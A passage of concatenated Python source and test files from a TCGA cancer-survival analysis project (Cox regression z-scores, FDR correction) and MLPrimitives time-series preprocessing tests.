censor = [1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1,
1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1]
split = [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0,
1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1]
cox_dict = analysis.do_cox(time, censor, split)
print(cox_dict)
assert cox_dict['n'] == 50
assert cox_dict['p'] < 1
assert sorted(cox_dict.keys()) == sorted(['n', 'z', 'p', 'hazard_ratio', 'lower_conf', 'upper_conf'])
def test_do_cox_fail():
time = np.random.randint(0,1, 5)
censor = np.random.randint(0,1, 5)
split = np.random.randint(0,1, 5)
cox_dict = analysis.do_cox(time, censor, split)
if len(list(cox_dict.keys())) == 0:
assert list(cox_dict.keys()) == []
else:
assert np.isnan(cox_dict['p'])
assert sorted(cox_dict.keys()) == sorted(['n', 'z', 'p', 'hazard_ratio', 'lower_conf', 'upper_conf'])
``` |
{
"source": "joan-smith/comprehensive-tcga-survival",
"score": 2
} |
#### File: comprehensive-tcga-survival/comprehensive_tcga_survival/main.py
```python
import pandas as pd
import os
import pathlib
import scipy
import glob
import biomarker_survival as surv
from comprehensive_tcga_survival import rppa
from comprehensive_tcga_survival import cn
from comprehensive_tcga_survival import mirna
from comprehensive_tcga_survival import rnaseq
from comprehensive_tcga_survival import methylation
from comprehensive_tcga_survival import mutations
from comprehensive_tcga_survival import Multivariate
from statsmodels.stats.multitest import fdrcorrection
#%%
dropbox_dir = '~/Dropbox/'
stage_key = dropbox_dir + 'comprehensive-tcga-survival/Multivariate/Stage_key.xlsx'
grade_key = dropbox_dir + 'comprehensive-tcga-survival/Multivariate/Grade_key.xlsx'
clinical = dropbox_dir + 'comprehensive-tcga-survival/raw-data/TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx'
raw_data = dropbox_dir + 'comprehensive-tcga-survival/raw-data/'
#%%
platforms = {'rppa': dropbox_dir + 'comprehensive-tcga-survival/raw-data/TCGA-RPPA-pancan-clean.txt',
'cn': dropbox_dir + 'comprehensive-tcga-survival/cn/cn_by_gene.csv',
'mirna': dropbox_dir + 'comprehensive-tcga-survival/raw-data/pancanMiRs_EBadjOnProtocolPlatformWithoutRepsWithUnCorrectMiRs_08_04_16.csv',
'rnaseq': dropbox_dir + 'comprehensive-tcga-survival/raw-data/EBPlusPlusAdjustPANCAN_IlluminaHiSeq_RNASeqV2.geneExp.tsv',
'methylation': (dropbox_dir + 'comprehensive-tcga-survival/raw-data/jhu-usc.edu_PANCAN_merged_HumanMethylation27_HumanMethylation450.betaValue_whitelisted.tsv',
dropbox_dir + 'comprehensive-tcga-survival/raw-data/HumanMethylation450_15017482_v1-2.csv'),
'mutations-non-synonymous': dropbox_dir + 'comprehensive-tcga-survival/raw-data/mc3.v0.2.8.PUBLIC.maf'}
#%%
tcga_cdr_local = surv.TCGA_CDR_util(clinical)
cancer_types = tcga_cdr_local.cancer_types()
#%% Prep univariate zscores
platform_outdir = dropbox_dir + 'comprehensive-tcga-survival/'
parallel = 35
for p, rd in platforms.items():
pathlib.Path(platform_outdir).mkdir(parents=True, exist_ok=True)
if p == 'rppa':
rppa.zscores(rd, clinical, platform_outdir, parallel)
if p == 'cn':
cn.zscores(rd, clinical, platform_outdir, parallel)
if p == 'rnaseq':
rnaseq.zscores(rd, clinical, platform_outdir, parallel)
if p == 'mirna':
mirna.zscores(rd, clinical, platform_outdir, parallel)
if p == 'methylation':
methylation_data = rd[0]
methylation_key = rd[1]
methylation.zscores(methylation_data, methylation_key, clinical, platform_outdir, parallel)
if p == 'mutations':
mutations.zscores(rd, clinical, platform_outdir, parallel)
#%% Prep Metadata
outdir = dropbox_dir + 'comprehensive-tcga-survival/'
metadata = {}
for p, rd in platforms.items():
if p == 'rppa':
metadata['rppa'] = rppa.metadata(rd, clinical)
if p == 'cn':
metadata['cn'] = cn.metadata(rd, clinical)
if p == 'mirna':
metadata['mirna'] = mirna.metadata(rd, clinical)
if p == 'rnaseq':
metadata['rnaseq'] = rnaseq.metadata(rd, clinical)
if p == 'methylation-large':
methylation_large_data = rd[0]
methylation_key = rd[1]
metadata['methylation-large'] = methylation.metadata(methylation_large_data, methylation_key, clinical)
if p == 'methylation':
methylation_data = rd[0]
methylation_key = rd[1]
metadata['methylation'] = methylation.metadata(methylation_data, methylation_key, clinical)
if p == 'mutations':
metadata['mutations'] = mutations.metadata(rd, clinical)
pd.DataFrame(metadata).to_csv(os.path.join(outdir, 'patient_counts_cloud.csv'))
#%% Prep Multivariate
parallel = 35
outdir = dropbox_dir + 'comprehensive-tcga-survival/age-stage-grade-sex'
multivar = Multivariate(tcga_cdr_local, stage_key, grade_key)
ctype_multivars = multivar.prep_all_multivar()
for p, rd in platforms.items():
platform_outdir = os.path.join(outdir, p)
if p == 'rppa':
rppa.zscores(rd, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
if p == 'cn':
cn.zscores(rd, clinical, platform_outdir, 14, additional_vars=ctype_multivars)
if p == 'rnaseq':
rnaseq.zscores(rd, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
if p == 'mirna':
mirna.zscores(rd, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
if p == 'methylation':
methylation_data = rd[0]
methylation_key = rd[1]
methylation.zscores(methylation_data, methylation_key, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
if p == 'mutations':
mutations.zscores(rd, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
#%% RNASEQ: Sex, RPSY41, and XIST
rnaseq_data = rnaseq.prep_data(platforms['rnaseq'])
dfs = []
for c in cancer_types:
df = rnaseq.ctype_cleaning(rnaseq_data, c, None)
df = df.join(tcga_cdr_local.cancer_type_data(c, extra_cols=['gender']), how='inner')
out_df = df[['XIST', 'RPS4Y1', 'gender']].copy()
print(c)
print(out_df)
out_df['cancer_type'] = c
dfs.append(out_df)
dfs = pd.concat(dfs, axis=0)
dfs.to_csv(os.path.join(outdir, 'XIST_RPS4Y1.csv'), index_label='patient', columns=['cancer_type', 'gender', 'XIST', 'RPS4Y1'])
#%% Methylation: Sex + methylation sites
methylation_data = methylation.prep_data(platforms['methylation'][0], platforms['methylation'][1])
genes = ['MOSPD1', 'SLC9A7', 'MTMR1', 'APEX2', 'OTUD5','PHF8', 'OCRL', 'FAM50A',
'IRAK1','FTSJ1', 'PRDX4', 'EMD', 'TMEM185A', 'NDUFB11', 'RBM10','TSPYL2',
'ELK1', 'HTATSF1', 'BCOR','CLCN5']
dfs = []
for c in cancer_types:
df = methylation.ctype_cleaning(methylation_data, c, None)
df = df.join(tcga_cdr_local.cancer_type_data(c, extra_cols=['gender']), how='inner')
out_df = df[genes + ['gender']].copy()
out_df['cancer_type'] = c
dfs.append(out_df)
dfs = pd.concat(dfs, axis=0)
dfs.to_csv(os.path.join(outdir, 'methylation_sex.csv'), index_label='patient')
#%% FDR correction -- group all platforms together for cancer type
indir = dropbox_dir + 'comprehensive-tcga-survival'
def count_sig(g):
print(g.name)
print('uncorrected sig:', (g['value'] <= 0.05).sum())
significant_corrected = g['corrected-p'] <= 0.05
print(significant_corrected.sum(), sum(significant_corrected))
return sum(g['corrected-p'] <= 0.05)
significant_corrected_pvals = {}
for c in cancer_types:
print(c)
pvals = {}
for p in platforms.keys():
platform_dir = os.path.join(indir, p)
ctype_file = c + '.zscores.out.csv'
if p == 'mutations':
ctype_file = c + '_mutation-fraction-0.02.zscores.out.csv'
df = pd.read_csv(os.path.join(platform_dir, ctype_file), index_col=0)
if('p' in df.columns):
pvals[p] = df.p
pval_df = pd.DataFrame(pvals).melt().dropna()  # combine p-values from all platforms for this cancer type
rejected, corrected_p = fdrcorrection(pval_df['value'].values)
pval_df['corrected-p'] = corrected_p
significant_corrected_pvals[c] = pval_df.groupby('variable').apply(count_sig)
print(pd.DataFrame(significant_corrected_pvals))
outdf = pd.DataFrame(significant_corrected_pvals).T
outdf.to_csv(os.path.join(outdir, 'significant_corrected_pvals.csv'))
#%% FDR correction -- within cancer type+platform fdr
outdir = dropbox_dir + 'comprehensive-tcga-survival/univariate-fdr'
indir = dropbox_dir + 'comprehensive-tcga-survival'
corrected_p_df = {}
for c in cancer_types:
platforms_corrected_counts = {}
for p in platforms.keys():
platform_dir = os.path.join(indir, p)
ctype_file = c + '.zscores.out.csv'
if 'mutations' in p:
ctype_file = c + '_0.02.zscores.out.csv'
df = pd.read_csv(os.path.join(platform_dir, ctype_file), index_col=0)
if('p' in df.columns):
rejected, corrected_p = fdrcorrection(df['p'].dropna(), alpha=0.05)
platforms_corrected_counts[p] = rejected.sum()
corrected_p_df[c] = platforms_corrected_counts
outdf = pd.DataFrame(corrected_p_df).T
outdf.to_csv(os.path.join(outdir, 'significant_corrected_pvals_ctype_0.05.csv'))
#%% stouffer fdr
outdir = dropbox_dir + 'comprehensive-tcga-survival/univariate-fdr'
for p in platforms.keys():
pancan = pd.read_csv(glob.glob(os.path.join(indir, p, '*pancan.csv'))[0], index_col=0)
pancan = pancan.dropna(subset=['stouffer unweighted'])
pancan['stouffer-p'] = scipy.stats.norm.sf(abs(pancan['stouffer unweighted'].values))*2
print(pancan[['stouffer unweighted', 'stouffer-p']])
rejected05, corrected_p = fdrcorrection(pancan['stouffer-p'], alpha = 0.05)
rejected01, corrected_p = fdrcorrection(pancan['stouffer-p'], alpha = 0.01)
pancan.loc[:, 'rejected-0.05'] = rejected05
pancan.loc[:, 'rejected-0.01'] = rejected01
pancan.loc[:, 'corrected-p'] = corrected_p
pancan.to_csv(os.path.join(outdir, p + '_univariate_fdr.csv'))
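# 'stouffer unweighted' holds a combined z-score per feature; the two-sided p-value
# computed above uses the normal survival function, e.g. scipy.stats.norm.sf(1.96) * 2
# is roughly 0.05, so |z| >= 1.96 corresponds to p <= 0.05 before FDR correction.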
#%% P53-mutant multivariate zscores
parallel = 35
outdir = dropbox_dir + 'comprehensive-tcga-survival/p53-mutant-multivariate-zscores'
mutations_df = mutations.prep_data(platforms['mutations-non-synonymous'])
p53_muts = {}
for ctype in tcga_cdr_local.cancer_types():
ctype_clinical = tcga_cdr_local.cancer_type_data(ctype)
ctype_muts = mutations.ctype_cleaning(mutations_df, ctype, ctype_clinical)
if '\'TP53' in list(ctype_muts.columns.values):
p53_muts[ctype] = ctype_muts[['\'TP53']]
else:
p53_muts[ctype] = pd.DataFrame({'\'TP53': [0]*ctype_muts.shape[0]}, index=ctype_muts.index)
p53_muts[ctype].columns = [i[1:] if '\'' in i else i for i in p53_muts[ctype].columns]
print(p53_muts[ctype].columns)
print('mutant selection complete')
for k in p53_muts.keys():
p53_muts[k].columns = [i + '_mut' for i in p53_muts[k].columns]
print(p53_muts['ACC'].columns)
for p, rd in platforms.items():
platform_outdir = os.path.join(outdir, p)
pathlib.Path(platform_outdir).mkdir(parents=True, exist_ok=True)
if p == 'rppa':
rppa.zscores(rd, clinical, platform_outdir, parallel, additional_vars=p53_muts)
if p == 'cn':
cn.zscores(rd, clinical, platform_outdir, 14, additional_vars=p53_muts)
if p == 'rnaseq':
rnaseq.zscores(rd, clinical, platform_outdir, parallel, additional_vars=p53_muts)
if p == 'mirna':
mirna.zscores(rd, clinical, platform_outdir, parallel, additional_vars=p53_muts)
if p == 'methylation':
methylation_data = rd[0]
methylation_key = rd[1]
methylation.zscores(methylation_data, methylation_key, clinical, platform_outdir, parallel, additional_vars=p53_muts)
if p == 'mutations-non-synonymous':
mutations.zscores(rd, clinical, platform_outdir, parallel, additional_vars=p53_muts)
```
#### File: comprehensive-tcga-survival/comprehensive_tcga_survival/rppa.py
```python
import pandas as pd
import argparse
import sys
import os
import biomarker_survival as surv
from .zscore_common import ZscoreCommon
def get_options(argv):
parser = argparse.ArgumentParser(description='Get rppa file, clinical file, optional output dir')
parser.add_argument('-r', action='store', dest='rppa')
parser.add_argument('-c', action='store', dest='tcga_cdr')
parser.add_argument('-p', action='store', dest='parallel', type=int)
parser.add_argument('-o', action='store', dest='output_directory', default='.')
ns = parser.parse_args(argv)
return ns.rppa, ns.tcga_cdr, ns.output_directory, ns.parallel
def ctype_cleaning(df, ctype, ctype_clinical): #ctype_clinical is unused
ctype_filter = ctype
if ctype in ['COAD', 'READ']:
ctype_filter = 'CORE'
df = df[df['TumorType'] == ctype_filter]
df = surv.maybe_clear_non_01s(df, 'SampleID', ctype)
df = surv.add_identifier_column(df, 'SampleID')
df = df.set_index('identifier')
df = df.drop(['SampleID', 'TumorType'], axis=1)
return df
def prep_data(rppa, extra_data=None):
rppa_data = pd.read_csv(rppa, sep='\t', header=0, na_values='???')
return rppa_data
def zscores(rppa, clinical, outdir, parallel, additional_vars={}):
rppa_zscores = ZscoreCommon(prep_data, ctype_cleaning)
rppa_zscores.zscores(rppa, clinical, outdir, parallel_workers=parallel, additional_vars=additional_vars)
pancan_df = surv.pancan(outdir, multivariate=(len(additional_vars) > 0))
pancan_df.to_csv(os.path.join(outdir, 'pancan.csv'), index_label='gene')
def metadata(rppa, clinical):
rppa_zscores = ZscoreCommon(prep_data, ctype_cleaning)
return rppa_zscores.metadata(rppa, clinical)
def main(argv=None):
rppa, clinical, outdir, parallel = get_options(argv)
zscores(rppa, clinical, outdir, parallel)
if __name__ == "__main__":
main()
```
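A hedged sketch of how the module above can be driven; the input paths, output directory and worker count are placeholders rather than values taken from the repository.
```python
# Command line, using the flags defined in get_options above (illustrative paths):
#   python rppa.py -r TCGA-RPPA-pancan-clean.txt \
#                  -c TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx \
#                  -o rppa-output -p 4

# Programmatic use, mirroring main.py:
from comprehensive_tcga_survival import rppa

rppa.zscores('TCGA-RPPA-pancan-clean.txt',                 # RPPA pan-cancer matrix (tab separated)
             'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx',  # clinical table read by TCGA_CDR_util
             'rppa-output',                                 # per-cancer-type zscores and pancan.csv land here
             parallel=4)                                    # number of worker processes
```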
#### File: comprehensive-tcga-survival/tests/test_cn.py
```python
import pytest
import os
import pandas as pd
import biomarker_survival as surv
from comprehensive_tcga_survival import cn
from comprehensive_tcga_survival import ZscoreCommon
FIXTURE_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'test_data',
)
def test_prep_annotation_file_structure():
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
annotation = cn.prep_annotation_file(hgnc_annotation)
assert annotation.index.name == 'gene_name'
assert annotation['feature_type'].value_counts().shape == (1,)
def test_prep_annotation_file_one_per_gene():
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
annotation = cn.prep_annotation_file(hgnc_annotation)
# check that there's only one row for each gene
assert annotation.reset_index().groupby('gene_name').count().max()['start'] == 1
assert annotation.shape == (977, 5)
def test_prep_annotation_file_minimum():
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
annotation = cn.prep_annotation_file(hgnc_annotation)
# check that we successfully took the minimum
assert annotation.loc['LINC01409']['start'] == 778747
def test_parse_chrom():
assert cn.parse_chrom('chr1') == 1
assert cn.parse_chrom('chr10') == 10
assert cn.parse_chrom('chrX') == 23
assert cn.parse_chrom('foo') == None
assert cn.parse_chrom('chrM') == 0
def test_prep_and_clean():
cn_path = os.path.join(FIXTURE_DIR, 'cn_small.seg')
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
cn_data = cn.prep_data(cn_path, extra_data=hgnc_annotation)
assert cn_data.shape == (36, 977)
assert 'TCGA-OR-A5J3-10A-01D-A29K-01' in list(cn_data.index)
assert 'ZNF683' in cn_data.columns
assert 'chr' not in cn_data.index
assert 'chr' not in cn_data.columns
def test_prep_and_clean_with_output(tmpdir):
cn_path = os.path.join(FIXTURE_DIR, 'cn_small.seg')
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
cn_data = cn.prep_data(cn_path, extra_data=hgnc_annotation, outdir=tmpdir)
assert cn_data.shape == (38, 977) # includes chromosome and start location
assert 'TCGA-OR-A5J3-10A-01D-A29K-01' in list(cn_data.index)
assert 'ZNF683' in cn_data.columns
assert 'chr' in cn_data.index
assert len(os.listdir(tmpdir)) == 2
assert sorted(os.listdir(tmpdir)) == sorted(['cn_by_gene.csv', 'prepped_annotations.csv'])
def test_zscores(tmpdir):
cn_path = os.path.join(FIXTURE_DIR, 'cn_small.seg')
hgnc_annotation = os.path.join(FIXTURE_DIR,
'gencode.v32.annotation.small.gtf')
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
cn_data = cn.prep_data(cn_path, extra_data=hgnc_annotation)
small_cn_data = cn_data.iloc[:,0:20]
cn_zscores = ZscoreCommon(cn.prep_data,
cn.ctype_cleaning,
extra_data=hgnc_annotation)
cox = cn_zscores.cancer_type_cox(small_cn_data, clin.cancer_type_data('ACC'),
'ACC', str(tmpdir))
print(cox)
assert cox.shape == (13, 6)
assert 'AGTRAP' in list(cox.index)
assert cox.loc['AGTRAP'].round(6).to_dict() == {
'hazard_ratio': 1.641397,
'lower_conf': 0.12899,
'n': 18.0,
'p': 0.702574,
'upper_conf': 20.886813,
'z': 0.381848}
```
#### File: comprehensive-tcga-survival/tests/test_multivariate.py
```python
import pytest
import os
import pandas as pd
import biomarker_survival as surv
from comprehensive_tcga_survival import Multivariate
FIXTURE_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'test_data',
)
def test_prep_multivar():
stage_key_path = os.path.join(FIXTURE_DIR, 'Stage_key.xlsx')
grade_key_path = os.path.join(FIXTURE_DIR, 'Grade_key.xlsx')
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
m = Multivariate(clin, stage_key_path, grade_key_path)
cols = m.prep_ctype_multivar('COAD')
print(cols)
print(cols.columns)
assert cols.shape == (457, 5)
assert list(cols.columns).sort() == ['gender', 'race', 'age_at_initial_pathologic_diagnosis', 'GTE_Stage_IV', 'GTE_Stage_III', 'GTE_Stage_II'].sort()
def test_prep_ctype_multivar_esca():
stage_key_path = os.path.join(FIXTURE_DIR, 'Stage_key.xlsx')
grade_key_path = os.path.join(FIXTURE_DIR, 'Grade_key.xlsx')
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
m = Multivariate(clin, stage_key_path, grade_key_path)
cols_esca = m.prep_ctype_multivar('ESCA')
assert cols_esca.shape == (185, 4)
assert list(cols_esca.columns).sort() == ['gender', 'race', 'age_at_initial_pathologic_diagnosis', 'GTE_G3', 'GTE_Stage_III'].sort()
def test_prep_all_multivar():
stage_key_path = os.path.join(FIXTURE_DIR, 'Stage_key.xlsx')
grade_key_path = os.path.join(FIXTURE_DIR, 'Grade_key.xlsx')
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
m = Multivariate(clin, stage_key_path, grade_key_path)
multivars = m.prep_all_multivar()
assert len(multivars) == 33
assert 'ACC' in multivars.keys()
assert 'BLCA' in multivars.keys()
```
#### File: comprehensive-tcga-survival/tests/test_mutations.py
```python
import pytest
import os
import pandas as pd
import biomarker_survival as surv
from comprehensive_tcga_survival import mutations
from comprehensive_tcga_survival import ZscoreCommon
FIXTURE_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'test_data',
)
def test_cancer_type_cox(tmpdir):
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
muts_path = os.path.join(FIXTURE_DIR, 'OV_mutations.txt')
muts_data = mutations.prep_data(muts_path)
mutation_zscores = ZscoreCommon(mutations.prep_data, mutations.ctype_cleaning,
use_presence_percentage_of_patients_threshold=True,
threshold_percent=0.02)
cox = mutation_zscores.cancer_type_cox(muts_data, clin.cancer_type_data('OV'), 'OV', str(tmpdir))
assert len(tmpdir.listdir()) == 1
assert tmpdir.listdir()[0].basename == 'OV_0.02.zscores.out.csv'
reference_results = pd.read_csv(os.path.join(FIXTURE_DIR, 'OV_0.02.zscores.out.csv'), index_col=0).astype(float)
cox_results = pd.read_csv(tmpdir.listdir()[0], index_col=0).astype(float)
cox_results = cox_results[reference_results.columns]
pd.testing.assert_frame_equal(cox_results, reference_results, check_less_precise=5)
```
#### File: comprehensive-tcga-survival/tests/test_rppa.py
```python
import pytest
import os
import pandas as pd
import biomarker_survival as surv
from comprehensive_tcga_survival import rppa
from comprehensive_tcga_survival import ZscoreCommon
FIXTURE_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'test_data',
)
def test_prep_and_clean():
rppa_path = os.path.join(FIXTURE_DIR, 'rppa_small.txt')
rppa_data = rppa.prep_data(rppa_path)
rppa_ACC = rppa.ctype_cleaning(rppa_data, 'ACC', pd.DataFrame())
assert rppa_ACC.shape == (46, 198)
assert rppa_data.shape == (46, 200) # includes columns for "SampleID" and "TumorType"
assert 'TCGA-PA-A5YG' in list(rppa_ACC.index)
def test_zscores(tmpdir):
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
rppa_path = os.path.join(FIXTURE_DIR, 'rppa_small.txt')
rppa_data = rppa.prep_data(rppa_path)
# 0th is the "index" col which is dropped during cleanup
rppa_subset = rppa_data[rppa_data.columns[0:52]]
rppa_zscores = ZscoreCommon(rppa.prep_data, rppa.ctype_cleaning)
cox = rppa_zscores.cancer_type_cox(rppa_subset, clin.cancer_type_data('ACC'), 'ACC', str(tmpdir))
assert cox.shape == (50, 6)
assert 'AKT' in list(cox.index)
assert cox.loc['AKT'].round(6).to_dict() == {
'hazard_ratio': 0.609382,
'lower_conf': 0.212732,
'n': 46.000000,
'p': 0.356296,
'upper_conf': 1.745601,
'z': -0.922446}
def test_multivar_zscore(tmpdir):
path = os.path.join(FIXTURE_DIR, 'TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx')
clin = surv.TCGA_CDR_util(path)
rppa_path = os.path.join(FIXTURE_DIR, 'rppa_small.txt')
rppa_data = rppa.prep_data(rppa_path)
# 0th is the "index" col which is dropped during cleanup
rppa_subset = rppa_data[rppa_data.columns[0:52]]
extra_cols = clin.cancer_type_data('ACC', extra_cols=['gender'])[['gender']]
extra_cols = extra_cols.replace({'MALE': 0, 'FEMALE': 1})
rppa_zscores = ZscoreCommon(rppa.prep_data, rppa.ctype_cleaning)
cox = rppa_zscores.cancer_type_cox_multivar(rppa_subset, clin.cancer_type_data('ACC'), 'ACC', str(tmpdir), extra_cols)
print(tmpdir)
assert cox.shape == (50, 11)
assert 'AKT' in list(cox.index)
assert cox.loc['AKT'].round(6).to_dict() == {
'gender-p': 0.104235,
'gender-z': 1.624659,
'gender_hazard_ratio': 2.893846,
'gender_lower_conf': 0.803079,
'gender_upper_conf': 10.427789,
'var-n': 46.0,
'var-p': 0.320603,
'var-z': -0.99322,
'var_hazard_ratio': 0.598101,
'var_lower_conf': 0.216907,
'var_upper_conf': 1.649208
}
``` |
{
"source": "joanvaquer/MLPrimitives",
"score": 3
} |
#### File: tests/custom/test_timeseries_preprocessing.py
```python
from unittest import TestCase
import numpy as np
import pandas as pd
from numpy.testing import assert_allclose
from mlprimitives.custom.timeseries_preprocessing import (
intervals_to_mask, rolling_window_sequences, time_segments_aggregate, time_segments_average)
class IntervalsToMaskTest(TestCase):
def _run(self, index, intervals, expected):
mask = intervals_to_mask(index, intervals)
assert_allclose(mask, expected)
def test_no_intervals(self):
index = np.array([1, 2, 3, 4])
intervals = None
expected = np.array([False, False, False, False])
self._run(index, intervals, expected)
def test_empty_list(self):
index = np.array([1, 2, 3, 4])
intervals = list()
expected = np.array([False, False, False, False])
self._run(index, intervals, expected)
def test_empty_array(self):
index = np.array([1, 2, 3, 4])
intervals = np.array([])
expected = np.array([False, False, False, False])
self._run(index, intervals, expected)
def test_one_interval(self):
index = np.array([1, 2, 3, 4])
intervals = np.array([[2, 3]])
expected = np.array([False, True, True, False])
self._run(index, intervals, expected)
def test_two_intervals(self):
index = np.array([1, 2, 3, 4, 5, 6, 7])
intervals = np.array([[2, 3], [5, 6]])
expected = np.array([False, True, True, False, True, True, False])
self._run(index, intervals, expected)
def test_two_intervals_list(self):
index = np.array([1, 2, 3, 4, 5, 6, 7])
intervals = [[2, 3], [5, 6]]
expected = np.array([False, True, True, False, True, True, False])
self._run(index, intervals, expected)
def test_start_index(self):
index = np.array([1, 2, 3, 4])
intervals = [[1, 2]]
expected = np.array([True, True, False, False])
self._run(index, intervals, expected)
def test_end_index(self):
index = np.array([1, 2, 3, 4])
intervals = [[3, 4]]
expected = np.array([False, False, True, True])
self._run(index, intervals, expected)
def test_whole_index(self):
index = np.array([1, 2, 3, 4])
intervals = [[1, 4]]
expected = np.array([True, True, True, True])
self._run(index, intervals, expected)
def test_exceed_index_start(self):
index = np.array([2, 3, 4])
intervals = [[1, 3]]
expected = np.array([True, True, False])
self._run(index, intervals, expected)
def test_exceed_index_end(self):
index = np.array([2, 3, 4])
intervals = [[3, 5]]
expected = np.array([False, True, True])
self._run(index, intervals, expected)
def test_exceed_index(self):
index = np.array([2, 3, 4])
intervals = [[1, 5]]
expected = np.array([True, True, True])
self._run(index, intervals, expected)
class RollingWindowSequencesTest(TestCase):
def _run(self, X, index, expected_X, expected_y, expected_X_index, expected_y_index,
window_size=2, target_size=1, step_size=1, target_column=0, drop=None,
drop_windows=False):
X, y, X_index, y_index = rolling_window_sequences(X, index, window_size, target_size,
step_size, target_column, drop,
drop_windows)
assert_allclose(X.astype(float), expected_X)
assert_allclose(y.astype(float), expected_y)
assert_allclose(X_index, expected_X_index)
assert_allclose(y_index, expected_y_index)
def test_no_drop(self):
X = np.array([[0.5], [1], [0.5], [1]])
index = np.array([1, 2, 3, 4])
expected_X = np.array([[[0.5], [1]], [[1], [0.5]]])
expected_y = np.array([[0.5], [1]])
expected_X_index = np.array([1, 2])
expected_y_index = np.array([3, 4])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index)
def test_drop_mask(self):
X = np.array([[0.5], [1], [0.5], [1], [0.5], [1], [0.5], [1], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9])
drop = np.array([False, False, False, True, True, False, False, False, False])
expected_X = np.array([[[0.5], [1]], [[1], [0.5]], [[0.5], [1]]])
expected_y = np.array([[0.5], [1], [0.5]])
expected_X_index = np.array([1, 6, 7])
expected_y_index = np.array([3, 8, 9])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_float(self):
X = np.array([[0.5], [0.5], [0.5], [1.0], [1.0], [0.5], [0.5], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = 1.0
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_None(self):
X = np.array([[0.5], [0.5], [0.5], [None], [None], [0.5], [0.5], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = None
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_float_nan(self):
X = np.array([[0.5], [0.5], [0.5], ['nan'], ['nan'], [0.5], [0.5], [0.5]]).astype(float)
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = float('nan')
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_str(self):
X = np.array([[0.5], [0.5], [0.5], ['test'], ['test'], [0.5], [0.5], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = "test"
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
def test_drop_bool(self):
X = np.array([[0.5], [0.5], [0.5], [False], [False], [0.5], [0.5], [0.5]])
index = np.array([1, 2, 3, 4, 5, 6, 7, 8])
drop = False
expected_X = np.array([[[0.5], [0.5]], [[0.5], [0.5]]])
expected_y = np.array([[0.5], [0.5]])
expected_X_index = np.array([1, 6])
expected_y_index = np.array([3, 8])
self._run(X, index, expected_X, expected_y, expected_X_index, expected_y_index,
drop=drop, drop_windows=True)
class TimeSegmentsAverageTest(TestCase):
def _run(self, X, interval, expected_values, expected_index, time_column):
values, index = time_segments_average(X, interval, time_column)
assert_allclose(values, expected_values)
assert_allclose(index, expected_index)
def test_array(self):
X = np.array([[1, 1], [2, 3], [3, 1], [4, 3]])
interval = 2
